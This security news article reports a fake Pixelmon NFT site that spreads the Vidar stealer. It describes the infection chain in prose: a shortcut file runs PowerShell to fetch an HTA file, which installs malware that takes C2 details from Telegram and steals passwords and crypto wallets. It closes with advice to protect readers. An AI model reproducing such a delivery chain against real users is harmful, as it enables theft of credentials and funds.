A counterfeit Pixelmon NFT site tempts visitors with free tokens and collectibles but simultaneously infects them with malware that robs their cryptocurrency wallets. Pixelmon is a famous NFT project with plans to create an online metaverse game where users may gather, train, and combat other players using pixelmon pets. The initiative has attracted a lot of attention, with almost 200,000 Twitter followers and over 25,000 Discord users.
Threat actors have replicated the original pixelmon.club website and built a fake version at pixelmon[.]pw to deliver malware to take advantage of this interest. Instead of providing a preview of the project’s game, the malicious site provides executables that put password-stealing malware on a device.
The website sells a package named Installer.zip that contains a faulty executable that does not infect customers with malware. However, MalwareHunterTeam, the first to identify this malicious site, detected additional dangerous files transmitted by it, allowing us to see what malware it was spreading.
Setup.zip, which contains the setup.lnk file, is one of the files sent by this fake website. Setup.lnk is a Windows shortcut that runs a PowerShell command to download pixelmon[.]pw’s system32.hta file. When the System32.hta file was examined, it downloaded Vidar, a password-stealing malware that isn’t as widely used as it once was. Security researcher Fumik0_, who has previously studied this malware family, verified this.
When run, the Vidar sample from the threat actor connects to a Telegram channel and retrieves the IP address of a malware’s command and control server. The malware will then obtain a configuration instruction from the C2 and download further modules to steal data from the afflicted device. Vidar malware may steal passwords from browsers and apps, as well as scan a computer for files with specific names, which it subsequently sends to the threat actor.
The C2 commands the malware to hunt for and steal numerous files, including text files, password files, cryptocurrency wallets, codes, backups, and authentication files, as shown in the malware setup. Since this is an NFT site, users are expected to have bitcoin wallets installed on their PCs. As a result, threat actors focus on looking for and stealing cryptocurrency-related material.
While the website is not currently providing a functioning payload, it is clear that the threat actors have been modifying it recently. It is because payloads available two days ago are no longer available. Based on the site’s activity, we should anticipate this campaign to continue to be active and working threats to be added shortly.
Due to the high number of scams aimed at stealing your bitcoin from NFT projects, you should always double-check that the URL you’re viewing is associated with the project you’re interested in. Furthermore, before running any executables from unfamiliar websites, scan them with antivirus software or use VirusTotal.